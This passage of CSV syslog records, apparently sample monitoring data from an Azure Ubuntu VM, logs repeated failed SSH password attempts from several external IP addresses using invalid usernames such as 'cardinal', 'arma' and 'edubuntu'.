+4592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:19,UbuntuDevEnv,2019-06-26 14:40:18,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 47.254.147.170 port 53454 [preauth],11531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,47.254.147.1,53454,,
+4593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:19,UbuntuDevEnv,2019-06-26 14:40:18,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 53454:11: Bye Bye [preauth],11531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,53454,,
+4594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:49,UbuntuDevEnv,2019-06-26 14:40:49,auth,UbuntuDevEnv,info,Invalid user Debian-exim from 68.183.50.149 port 56570,11641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Debian,68.183.50.1,56570,,
+4595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:49,UbuntuDevEnv,2019-06-26 14:40:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,11641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:49,UbuntuDevEnv,2019-06-26 14:40:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:52,UbuntuDevEnv,2019-06-26 14:40:51,auth,UbuntuDevEnv,info,Failed password for invalid user Debian-exim from 68.183.50.149 port 56570 ssh2,11641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Debian,68.183.50.1,56570,,
+4598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:52,UbuntuDevEnv,2019-06-26 14:40:51,auth,UbuntuDevEnv,info,Disconnected from invalid user Debian-exim 68.183.50.149 port 56570 [preauth],11641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Debian,68.183.50.1,56570,,
+4599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:52,UbuntuDevEnv,2019-06-26 14:40:51,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 56570:11: Bye Bye [preauth],11641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,56570,,
+4600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:54,UbuntuDevEnv,2019-06-26 14:40:54,auth,UbuntuDevEnv,info,Invalid user cardinal from 164.132.192.219 port 49891,11658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cardinal,164.132.192.2,49891,,
+4601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:54,UbuntuDevEnv,2019-06-26 14:40:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,11658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:54,UbuntuDevEnv,2019-06-26 14:40:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:56,UbuntuDevEnv,2019-06-26 14:40:56,auth,UbuntuDevEnv,info,Failed password for invalid user cardinal from 164.132.192.219 port 49891 ssh2,11658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cardinal,164.132.192.2,49891,,
+4604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:56,UbuntuDevEnv,2019-06-26 14:40:56,auth,UbuntuDevEnv,info,Disconnected from invalid user cardinal 164.132.192.219 port 49891 [preauth],11658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cardinal,164.132.192.2,49891,,
+4605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:40:56,UbuntuDevEnv,2019-06-26 14:40:56,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 49891:11: Bye Bye [preauth],11658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,49891,,
+4606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:41:01,UbuntuDevEnv,2019-06-26 14:41:01,auth,UbuntuDevEnv,info,Invalid user avahi-autoipd from 220.134.138.111 port 37692,11681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,220.134.138.1,37692,,
+4607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:41:01,UbuntuDevEnv,2019-06-26 14:41:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:41:01,UbuntuDevEnv,2019-06-26 14:41:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,11681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:41:04,UbuntuDevEnv,2019-06-26 14:41:03,auth,UbuntuDevEnv,info,Failed password for invalid user avahi-autoipd from 220.134.138.111 port 37692 ssh2,11681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,220.134.138.1,37692,,
+4610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:41:04,UbuntuDevEnv,2019-06-26 14:41:04,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 37692:11: Bye Bye [preauth],11681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,37692,,
+4611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:41:04,UbuntuDevEnv,2019-06-26 14:41:04,auth,UbuntuDevEnv,info,Disconnected from invalid user avahi-autoipd 220.134.138.111 port 37692 [preauth],11681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avahi,220.134.138.1,37692,,
+4612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:26,UbuntuDevEnv,2019-06-26 14:42:25,auth,UbuntuDevEnv,info,Invalid user arma from 164.132.192.219 port 58452,11982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arma,164.132.192.2,58452,,
+4613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:26,UbuntuDevEnv,2019-06-26 14:42:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,11982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:26,UbuntuDevEnv,2019-06-26 14:42:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,11982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:28,UbuntuDevEnv,2019-06-26 14:42:27,auth,UbuntuDevEnv,info,Failed password for invalid user arma from 164.132.192.219 port 58452 ssh2,11982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arma,164.132.192.2,58452,,
+4616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:28,UbuntuDevEnv,2019-06-26 14:42:27,auth,UbuntuDevEnv,info,Disconnected from invalid user arma 164.132.192.219 port 58452 [preauth],11982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arma,164.132.192.2,58452,,
+4617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:28,UbuntuDevEnv,2019-06-26 14:42:27,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 58452:11: Bye Bye [preauth],11982,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,58452,,
+4618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:53,UbuntuDevEnv,2019-06-26 14:42:53,auth,UbuntuDevEnv,info,Invalid user tmp from 220.134.138.111 port 54802,12077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,220.134.138.1,54802,,
+4619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:53,UbuntuDevEnv,2019-06-26 14:42:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:53,UbuntuDevEnv,2019-06-26 14:42:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,12077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:55,UbuntuDevEnv,2019-06-26 14:42:54,auth,UbuntuDevEnv,info,Failed password for invalid user tmp from 220.134.138.111 port 54802 ssh2,12077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,220.134.138.1,54802,,
+4622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:55,UbuntuDevEnv,2019-06-26 14:42:55,auth,UbuntuDevEnv,info,Disconnected from invalid user tmp 220.134.138.111 port 54802 [preauth],12077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tmp,220.134.138.1,54802,,
+4623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:42:55,UbuntuDevEnv,2019-06-26 14:42:55,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 54802:11: Bye Bye [preauth],12077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,54802,,
+4624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:26,UbuntuDevEnv,2019-06-26 14:43:25,auth,UbuntuDevEnv,info,Invalid user edubuntu from 47.254.147.170 port 35394,12198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edubuntu,47.254.147.1,35394,,
+4625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:26,UbuntuDevEnv,2019-06-26 14:43:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:26,UbuntuDevEnv,2019-06-26 14:43:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,12198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:28,UbuntuDevEnv,2019-06-26 14:43:27,auth,UbuntuDevEnv,info,Failed password for invalid user edubuntu from 47.254.147.170 port 35394 ssh2,12198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edubuntu,47.254.147.1,35394,,
+4628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:28,UbuntuDevEnv,2019-06-26 14:43:27,auth,UbuntuDevEnv,info,Disconnected from invalid user edubuntu 47.254.147.170 port 35394 [preauth],12198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edubuntu,47.254.147.1,35394,,
+4629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:28,UbuntuDevEnv,2019-06-26 14:43:27,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 35394:11: Bye Bye [preauth],12198,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,35394,,
+4630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:58,UbuntuDevEnv,2019-06-26 14:43:57,auth,UbuntuDevEnv,info,Invalid user basile from 164.132.192.219 port 38783,12309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,basile,164.132.192.2,38783,,
+4631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:58,UbuntuDevEnv,2019-06-26 14:43:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:43:58,UbuntuDevEnv,2019-06-26 14:43:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,12309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:00,UbuntuDevEnv,2019-06-26 14:43:59,auth,UbuntuDevEnv,info,Failed password for invalid user basile from 164.132.192.219 port 38783 ssh2,12309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,basile,164.132.192.2,38783,,
+4634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:00,UbuntuDevEnv,2019-06-26 14:43:59,auth,UbuntuDevEnv,info,Disconnected from invalid user basile 164.132.192.219 port 38783 [preauth],12309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,basile,164.132.192.2,38783,,
+4635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:00,UbuntuDevEnv,2019-06-26 14:43:59,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 38783:11: Bye Bye [preauth],12309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,38783,,
+4636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:43,UbuntuDevEnv,2019-06-26 14:44:43,auth,UbuntuDevEnv,info,Invalid user partha from 220.134.138.111 port 43668,12475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,partha,220.134.138.1,43668,,
+4637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:43,UbuntuDevEnv,2019-06-26 14:44:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,12475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:43,UbuntuDevEnv,2019-06-26 14:44:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:46,UbuntuDevEnv,2019-06-26 14:44:45,auth,UbuntuDevEnv,info,Failed password for invalid user partha from 220.134.138.111 port 43668 ssh2,12475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,partha,220.134.138.1,43668,,
+4640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:46,UbuntuDevEnv,2019-06-26 14:44:45,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 43668:11: Bye Bye [preauth],12475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,43668,,
+4641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:46,UbuntuDevEnv,2019-06-26 14:44:45,auth,UbuntuDevEnv,info,Disconnected from invalid user partha 220.134.138.111 port 43668 [preauth],12475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,partha,220.134.138.1,43668,,
+4642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:54,UbuntuDevEnv,2019-06-26 14:44:53,auth,UbuntuDevEnv,info,Invalid user mb from 47.254.147.170 port 52770,12515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mb,47.254.147.1,52770,,
+4643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:54,UbuntuDevEnv,2019-06-26 14:44:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:54,UbuntuDevEnv,2019-06-26 14:44:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,12515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:56,UbuntuDevEnv,2019-06-26 14:44:55,auth,UbuntuDevEnv,info,Failed password for invalid user mb from 47.254.147.170 port 52770 ssh2,12515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mb,47.254.147.1,52770,,
+4646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:56,UbuntuDevEnv,2019-06-26 14:44:55,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 52770:11: Bye Bye [preauth],12515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,52770,,
+4647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:44:56,UbuntuDevEnv,2019-06-26 14:44:55,auth,UbuntuDevEnv,info,Disconnected from invalid user mb 47.254.147.170 port 52770 [preauth],12515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mb,47.254.147.1,52770,,
+4648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:45:30,UbuntuDevEnv,2019-06-26 14:45:29,auth,UbuntuDevEnv,info,Invalid user u1 from 164.132.192.219 port 47343,12730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,u1,164.132.192.2,47343,,
+4649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:45:30,UbuntuDevEnv,2019-06-26 14:45:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:45:30,UbuntuDevEnv,2019-06-26 14:45:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,12730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:45:32,UbuntuDevEnv,2019-06-26 14:45:31,auth,UbuntuDevEnv,info,Failed password for invalid user u1 from 164.132.192.219 port 47343 ssh2,12730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,u1,164.132.192.2,47343,,
